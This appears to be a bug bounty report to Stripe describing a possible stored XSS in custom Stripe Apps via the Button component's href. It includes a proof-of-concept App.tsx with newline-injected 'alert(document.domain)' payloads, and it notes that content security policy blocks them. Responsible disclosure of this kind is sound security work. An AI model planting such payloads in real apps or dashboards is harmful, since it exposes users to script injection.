XSS vulnerability without a content security bypass in a `CUSTOM` App through Button tag

## Summary: Hi security team members, Hope you are well and doing great :) I found a **Possible XSS vulnerability in `CUSTOM` App through the Button tag but I was not able to bypass a content security policy.** This report is similar to my previous report(#1804177). The only difference is that the previous issue I found on a live Stripe App(which uses a `Link` tag maybe). But, here in this report "I found it possible to create an XSS vulnerability with the help of the `Button` tag". ## Description: **This occurs when you create a CUSTOM app with the Button tag**. Like:- `<Button href="blocked://%0aalert(document.domain)">XSS</Button>` ## Steps To Reproduce: 1. Create a demo Custom app through stripe-cli 2. Replace your viewport with `"viewport": "stripe.dashboard.drawer.default"` in `stripe-app.json`, So the app works on every page in the dashboard 3. Copy and paste the below code into your `App.tsx` file ``` import { Box, ContextView, Inline, Link } from "@stripe/ui-extension-sdk/ui"; import type { ExtensionContextValue } from "@stripe/ui-extension-sdk/context"; import {Button} from '@stripe/ui-extension-sdk/ui'; import {Img} from '@stripe/ui-extension-sdk/ui' import {Chip, ChipList} from '@stripe/ui-extension-sdk/ui'; import BrandIcon from "./brand_icon.svg"; /** * This is a view that is rendered in the Stripe dashboard's customer detail page. * In stripe-app.json, this view is configured with stripe.dashboard.customer.detail viewport. * You can add a new view by running "stripe apps add view" from the CLI. */ const App = ({ userContext, environment }: ExtensionContextValue) => { return ( <ContextView title="XSS POC" brandColor="#F6F8FA" // replace this with your brand color brandIcon={BrandIcon} // replace this with your brand icon > <Button href="blocked://%0aalert(123)"> XSS with %0a </Button> <Button href="blocked://%0dalert(document.domain)"> XSS with %0d </Button> </ContextView> ); }; export default App; ``` 3. Then, Run and Open your app 4. Once you open your app then after click on the button link. It will doesn't execute because of CSP. {F2106779} 5. But, If you turn off your CSP protection with the help of an [extension](https://chrome.google.com/webstore/detail/disable-content-security/ieelmcmcagommplceebfedjlakkhpden) then XSS will execute. {F2106780} ## Video POC: {F2106781} ## Impact If an attacker is able to bypass CSP then there is a possible stored XSS vulnerability in https://dashboard.stripe.com.